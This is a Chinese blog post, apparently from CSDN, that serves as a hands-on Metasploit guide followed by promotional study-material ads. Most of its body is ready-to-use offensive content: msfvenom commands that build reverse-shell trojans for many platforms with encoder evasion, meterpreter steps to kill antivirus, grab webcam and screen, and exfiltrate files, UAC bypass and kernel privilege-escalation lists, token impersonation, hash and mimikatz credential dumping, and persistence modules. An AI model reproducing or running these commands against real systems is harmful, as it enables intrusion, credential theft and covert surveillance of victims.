首页 > 编程语言 >[2023最新]美少妇Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南_msf下载

[2023最新]美少妇Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南_msf下载

时间:2024-09-13 13:51:04浏览次数:14  
标签:2003 windows Windows 美少妇 下载安装 使用 msfvenom 2008 2012

模块含义

auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。

encoders:编码工具,用于躲过入侵检测和过滤系统。

exploit:主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如: use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)

payload:攻击载荷,是攻击者发送给系统执行的指令的。payload主要是在目标机执行的,exploits是在本地执行作用于目标机。

post:该目录存放exploits执行成功后,向目标机发送的一些功能性指令,如:提权、获取hash等。

常用命令

search //搜索
use+编号 //利用
show options //查看参数
info  //展示出指定渗透攻击或模块的相关信息
set  //设置参数
run  //执行
back  //退出当前模块

常用载荷使用(不强调大小写)

RHOSTS  //对方ip
LHOSTS  //自己ip
RPORT  //端口,一般默认的就行
VERBOSE //打印输出,显示当前在干什么
STOP_ON_SUCCESS  //破解成功后停止操作
USER_FILE //接用户名字典
PASS_FILE  //接密码字典

免费福利

【----帮助网安学习,以下所有学习资料免费领!】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

爆破

常用的为mysql和ssh爆破

自带字典位置

/usr/share/metasploit-framework/data/wordlists/

ssh

search ssh_log

img

img

mysql

大概意思同上

攻击

在本地环境使用samba进行攻击会出现这个

img

原因是Windows是中文的,要英文版即可

远程的不管是否能行试一下就可以


生成木马

windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe
msfvenom -p windows/meterpreter/bind_tcp  LPORT=<Attack Port> -f dll >/root/bind_xx.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.134.131 LPORT=8899 RC4PASSWORD=admin123456qqq -f dll -o ~/y.dll
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.4 lport=1212 -e x86/shikata_ga_nai -i 5 -f c > t.c
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.133.132 lport=1212 -e x86/shikata_ga_nai -i 5 -f raw > test.c
msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333  -f raw -o shellcode.raw
msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex LHOST=192.168.134.131 LPORT=4444 -o msf.txt

安卓app
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -o ~/Desktop/test2.apk  

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f  elf > shell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=34.92.252.2 LPORT=10053 -f  elf > cloud
msfvenom -p linux/x64/meterpreter_reverse_https LHOST=192.168.134.131 LPORT=6666 -f  elf > shell
msfvenom -p cmd/unix/reverse_bash lhost=34.92.252.2 lport=10001 R

Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f macho >  shell.macho

PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php

ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666  -f asp > shell.asp

ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666  -f  aspx > shell.aspx

JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f  raw > shell.jsp

Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.85.130 LPORT=6666 -f   raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.85.130 LPORT=6666 -f raw > shell.pl

Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.85.130 LPORT=6666 -f   raw > shell.py

java
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jar  

war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=端口 -f war > shell.war
msfvenom -p java/meterpreter/reverse_http LHOST=ip LPORT=端口 -f war > shell.war

powershell
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f psh > shell.ps1 
powershell.exe -ExecutionPolicy Bypass -File shell.ps1

Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe

大致步骤

在攻击机上开启监听

use exploit/multi/handler

img

上面生成的马开启的是哪个就设置哪个

img

开启监听并在目标机上运行木马

img

反弹成功后常用命令

进程迁移
ps //查看目标机正在运行的进程
getpid //查看当前进程
migrate N//迁移进程,N为PID号,有些可能会迁移失败多试几个
run post/windows/manage/migrate //自动迁移进程
kill N //强制结束进程,N为PID号

进程迁移后原先的进程会自动销毁,如果没有销毁则使用kill强制杀掉

meterpreter命令
sysinfo //查看目标系统命令
run post/windows/gather/checkvm  //查看是否运行在虚拟机上
route  //查看网络设置
run post/windows/manage/killav //关闭杀毒软件
background  //把当前会话放入后台,会给出个session值,回到会话参照图一,任何地方都是可以回去的
getuid  //查看当前用户
run post/windows/manage/enable_rdp  //开启远程桌面
run post/multi/manage/autoroute  //自动添加路由
route add 0.0.0.0 0.0.0.0 4 //手动添加路由(全网段),4表示session值 见图三
route print // 查看已添加对的路由 见图三
run post/windows/gather/enum_applications  //目标机上的应用程序
run post/windows/gather/credentials/windows_autologin  //抓取自动登录的用户名和密码,一般不行
load espia //加载Espia插件
screengrab  //抓取目标机的屏幕截图,先加载Espia再用此命令
screenshare  //实时显示目标机屏幕
webcam_list  //查看目标机有无摄像头
webcam_snap  //抓取照片
webcam_stream  //摄像头直播
shell  //进入目标机shell
exit  //返回
pwd  //查看当前处于目标机哪个目录
cd C:\\Users\\华扬\\Desktop 切换目录,当然也可以加转义字符
search -f *.txt -d C:\\Users\\华扬\\Desktop  //搜索文件,要搜索整台电脑search -f *.txt即可
download C:\\Users\\华扬\\Desktop\\新建文本文档.txt /root  //下载目标文件
upload /home/huayang/123.exe C:\\Users\\华扬\\Desktop  //上传文件到目标机器

img图一

img图二

img图三

提权

相关命令

chcp 65001  //在shell下执行以防止乱码

img

getsystem提权

可能性较低,可以试一下

getsystem 

img

bypassuac

search bypassuac  /下面的项目都是可以用于提权的

img

exploit/windows/local/bypassuac  //成功率最高
exploit/windows/local/bypassuac_eventvwr //成功率最高
windows/local/bypassuac_vbs//成功较高
exploit/windows/local/bypassuac_injection   //针对x86
exploit/windows/local/bypassuac_comhijack//针对x86
windows/local/ask
exploit/windows/local/bypassuac_sdclt  //强烈不建议使用
exploit/windows/local/bypassuac_dotnet_profiler//强烈不建议使用

img

提权并不是马上成功,后面还需要加上getsystem

内核提权

方法一
run post/windows/gather/enum_patches //查询已安装的补丁
use post/multi/recon/local_exploit_suggester //查询可使用漏洞,结果可信度较低,不妨一试

查询的补丁如msf没有可在github下载

https://github.com/SecWiki/windows-kernel-exploits

方法二

用systeminfo查看安装了哪些补丁

然后再在下表对应版本找哪些补丁没有安装,搜索编号攻击即可

CVE-2021-1732 [Windows Win32k 提权漏洞] (Windows 10, 2019/20H2)
CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019)
CVE-2020-0796 [Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909 )
CVE-2019-1458 [当Win32k组件无法正确处理内存中的对象时,Windows中存在一个特权提升漏洞](Windows 7/8/10/2008/2012/2016)
CVE-2019-0803 [Win32k 组件无法正确处理内存中的对象时,Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016/2019)
CVE-2018-8639 [Win32k 组件无法正确处理内存中的对象时,Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016)
CVE-2018-1038 [Windows 内核提权漏洞](Windows 7 SP1/Windows Server 2008 R2 SP1)
CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability](Windows 10 版本 1703/Windows 10 版本 1709/Windows Server 版本 1709)
CVE-2018-8453 [Windows Win32k 组件中的提权漏洞] (>= windows 8.1)
CVE-2018-8440 [Windows ALPC 提权漏洞] (windows 7/8.1/10/2008/2012/2016)
MS17-017  [KB4013081] [GDI 调色板对象本地权限提升](Windows 7/8)
CVE-2017-8464  [LNK远程执行代码漏洞](Windows 10 / 8.1 / 7/2016/2010/2008)
CVE-2017-0213  [Windows COM 提权漏洞] (windows 10/8.1/7/2016/2010/2008)
CVE-2018-0833 [SMBv3 空指针取消引用拒绝服务] (Windows 8.1/Server 2012 R2)
CVE-2018-8120 [Win32k 提权漏洞] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
MS17-010  [KB4013389] [Windows 内核模式驱动程序] (windows 7/2008/2003/XP)
MS16-135  [KB3199135] [Windows 内核模式驱动程序] (2016)
MS16-111  [KB3186973] [内核 API] (Windows 10 10586 (32/64)/8.1)
MS16-098  [KB3178466] [内核驱动程序] (Win 8.1)
MS16-075  [KB3164038] [热土豆] (2003/2008/7/8/2012)
MS16-034  [KB3143145] [内核驱动程序] (2008/7/8/10/2012)
MS16-032  [KB3143141] [辅助登录句柄] (2008/7/8/10/2012)
MS16-016  [KB3136041] [WebDAV] (2008/Vista/7)
MS16-014  [K3134228] [远程代码执行] (2008/Vista/7)
MS15-097  [KB3089656] [远程代码执行] (win8.1/2012)
MS15-076  [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077  [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061  [KB3057839] [内核驱动程序] (2003/2008/7/8/2012)
MS15-051  [KB3057191] [Windows内核模式驱动程序](2003/2008/7/8/2012)
MS15-015  [KB3031432] [内核驱动程序] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-010  [KB3036220] [内核驱动程序] (2003/2008/7/8)
MS15-001  [KB3023266] [内核驱动程序] (2008/2012/7/8)
MS14-070  [KB2989935] [内核驱动程序] (2003)
MS14-068  [KB3011780] [域权限提升] (2003/2008/2012/7/8)
MS14-058  [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-066  [KB2992611] [Windows Schannel 允许远程代码执行] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1)
MS14-040  [KB2975684] [AFD 驱动程序] (2003/2008/2012/7/8)
MS14-002  [KB2914368] [NDProxy] (2003/XP)
MS13-053  [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046  [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005  [KB2778930] [内核模式驱动程序] (2003/2008/2012/win7/8)
MS12-042  [KB2972621] [服务总线] (2008/2012/win7)
MS12-020  [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080  [KB2592799] [AFD.sys] (2003/XP)
MS11-062  [KB2566454] [NDISTAPI] (2003/XP)
MS11-046  [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011  [KB2393802] [内核驱动程序] (2003/2008/7/XP/Vista)
MS10-092  [KB2305420] [任务计划程序] (2008/7)
MS10-065  [KB2267960] [FastCGI](IIS 5.1、6.0、7.0 和 7.5)
MS10-059  [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048  [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015  [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS10-012  [KB971468] [SMB 客户端 Trans2 堆栈溢出] (Windows 7/2008R2)
MS09-050  [KB975517] [远程代码执行] (2008/Vista)
MS09-020  [KB970483] [IIS 6.0](IIS 5.1 和 6.0)
MS09-012  [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068  [KB957097] [远程代码执行] (2000/XP)
MS08-067  [KB958644] [远程代码执行] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-066  [KB956803] [AFD.sys] (Windows 2000/XP/Server 2003)
MS08-025  [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040  [KB921883] [远程代码执行] (2003/xp/2000)
MS05-039  [KB899588] [PnP 服务] (Win 9X/ME/NT/2000/XP/2003)
MS03-026  [KB823980] [RPC接口中的缓冲区溢出](/ NT / 2000 / XP / 2003)

https://github.com/SecWiki/windows-kernel-exploits

令牌窃取

基础知识

令牌(Token)就是系统的临时秘钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于那个用户的。他允许你在不提供密码或其他凭证的前提下,访问网络和系统资源

相关命令
use incognito   //加载模块
list_tokens -u //列出可用的token,先加载模块才可以使用这个

impersonate_token + token  //伪造令牌,token记得使用\\

实战利用

用win7和winsever2012在普通用户下都只有一个token

img

其实令牌的数量取决于shell的访问级别也就是获取的权限

img

当我提权为system级别时,多出来三个令牌

实战中可能有些普通用户有高权限令牌,不然怎么叫提权呢

这里为了实验就只能将就一下了

我们现在拥有的是system权限

img

我们就用此方法降权试试看,

原理都是相同的,只要有令牌正反都可试试看

降为user权限,也就是WIN-GT4B41U3H8D\华扬

img

一系列操作过后发现可行,感觉此方法多用于降权使用

注意:在输入tooken是记得要输入双反斜杠(\)

Hash攻击

基础命令
hashdump  //导出目标机sam的hash值
run post/windows/gather/smart_hashdump //更为强大的导出目标机sam的hash值

实战利用
hash模块

这条命令需要管理员权限和管理员权限的进程才能使用

我现在是管理员权限依旧报错

img

同时还需要管理员权限的进程才可以使用,很很显然我们现在的是普通用户的运行程序

img

找到含有system权限的进程,我们在system权限下把进程迁入2304这个进程

img

成功拿到hash值

格式为

用户名称: RID:LM-HASH 值: NT-HASH 值,rid 是 windows 系统账户对应固定的值,类似于 linux 的 uid,gid 号,500 为 administrator,501 为 guest 等。而 lm 的 hash 和 nt 的 hash,他们都是对用户密码进行的加密,只不过加密方式不一样。复制其中一种加密的 hash 可以直接使用在线 cmd5 破解

smart_hashdump

相较于hashdump smart_hashdump则更加强大

不需要system进程,还不会乱码

win7以上的系统还需要绕过UAC也就是还是要system下才能运行

img

其中这个解出来就为管理员密码

img

QuarksPwDump

拿到shell后我们需要把文件传到目标机

现在我们是低权限,不能随便传目录

只有传送users目录下的用户

img

不知道用户名怎么办?

我们先cd c:\users再ls看看即可

img

知道了用户名我们最好传入文档里(记得是两个反斜杠\),也就是C:\Users\华扬\Documents

经过测试这种方法只能使用windows xp系统

xp随便传入哪里都不需要使用管理用户,所以我们就直接传入xp的c盘

img

kiwi模块(也就是老版本的mimikatz)
基础命令
load kiwi  //开启模块
creds_all  //获取密码
kiwi_cmd sekurlsa::logonpasswords  //获取密码

实战

这个必须要system权限才能使用,所以也没啥用

img

img

img

移植漏洞利用代码模块

这里以永恒之蓝为例

地址:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

权限维持

Persistence模块

run prsistence -A -S -U -i 10 -p 2333 -r 172.16.181.8

A:自动启动payload程序
S:系统启动时加载
U:用户登录时自动启动
i:回连的时间间隔
p:监听反向连接端口号
r:目标机器IP地址

本地测试未果

使用成功会返还一个session

Metsvc 模块

run metsvc -A

会在目标机器上开一个服务

监听31337端口利用handler下的windows/metsvc_bind_tcp模块,重新获得shell

img

本地实验还是失败,不知道为啥会死亡

网络安全学习路线

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

阶段一:基础入门

img

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完年薪15w+没有问题

阶段二:技术进阶(到了这一步你才算入门)

img

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容可在文章后方领取。

在这里插入图片描述

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

感谢您观看我的文章,谢谢!!

标签:2003,windows,Windows,美少妇,下载安装,使用,msfvenom,2008,2012
From: https://blog.csdn.net/shanguicsdn111/article/details/142209041

相关文章

  • 【北京迅为】itop-龙芯2k1000 sylixos 嵌入式实时系统烧写手册-第三章工具使用
     迅为itop-龙芯2k1000开发板  硬件配置:国产龙芯处理器,双核64位系统,板载2GDDR3内存,流畅运行Busybox、Buildroot、Loognix、QT5.12系统!接口:板载4路USBHOST、2路千兆以太网、2路UART、2路CAN总线、MiniPCIE、SATA固态盘接口、4G接口、GPS接口、WIFI、蓝牙、MiniHDMI......
  • Android Service服务使用方法
    启动服务的方法我们要隐式启动一个Service,首先我们需要配置AndroidMainfest.xml<serviceandroid:name=".MyAsdlService"><intent-filter><actionandroid:name="com.example.myasdlservice"/></int......
  • ChatGPT 国内使用知识【最新更新】
    ChatGPT很强大,聊聊天、写论文、搞翻译、写代码、写文案、审合同等,真是无所不能~近两年人工智能AI非常火热,可以这么说:已经从“能用”到“好用”再到“离不开”了。。。已经用上AI的,尤其用上ChatGPT的人,真的是享受到了AI发展的红利,并且还一直不断领先~~~相信未来几年,随着技术......
  • AIGC 工具可图KOLORS的使用感受
    可图KOLORS是一款基于人工智能的图像生成工具,它通过深度学习技术,能够根据用户输入的文字描述或关键词,自动生成相应的图像。以下是我对可图KOLORS的使用感受:一、界面设计直观易用可图KOLORS的界面设计简洁明了,操作流程直观易懂。无论是新手还是有一定经验的设计师,都能快速上手并熟练......
  • Linux-Curl使用
    在Linux中,curl是一个强大的命令行工具,用于从服务器或其他URL地址获取数据或与网络服务进行交互。对于自己写不明白的curl,可以使用postman、apipost等接口工具生成curl请求,用于测试#下载单个文件默认将输出打印到标准输出中(STDOUT)中curlhttp://www.centos.org......
  • MyBatis 3种 使用 SQL 语句的方式;注解方式、注解提供器方式、XML 配置方式
    结论:为了统一使用方式,建议采用XML配置的方式;MyBatis提供了多种配置和使用SQL语句的方式,主要包括:注解方式(如@Select)、注解提供器方式(如@SelectProvider)和XML配置方式。每种方式都有其独特的优缺点,适用于不同的场景。以下是这三种方式的详细对比:1.@Select这类注解优点:......
  • 使用 Nuxt Kit 检查模块与 Nuxt 版本兼容性
    title:使用NuxtKit检查模块与Nuxt版本兼容性date:2024/9/13updated:2024/9/13author:cmdragonexcerpt:通过NuxtKit提供的兼容性检查工具,您可以轻松地确保您的模块与不同版本的Nuxt兼容。这将有助于您在开发过程中避免潜在的兼容性问题,从而提升您的开发效率......
  • 【使用 3D FDTD 代码和 UPML 进行微带分支线耦合器分析】三维有限差分时域方法在平面
       ......
  • 【使用UPML的3D FDTD代码进行微带低通滤波器分析】应用三维有限差分时域法分析平面微
       ......
  • 国产linux系统(银河麒麟,统信uos)使用 PageOffice 国产版实现Office文档在线预览
    PageOffice国产版:支持信创系统,支持银河麒麟V10和统信UOS,支持X86(intel、兆芯、海光等)、ARM(飞腾、鲲鹏、麒麟等)、龙芯(LoogArch)芯片架构。本示例关键代码的编写位置Vue+Springboot注意本文中展示的代码均为关键代码,复制粘贴到您的项目中,按照实际的情况,例如文档路径,用户名等做......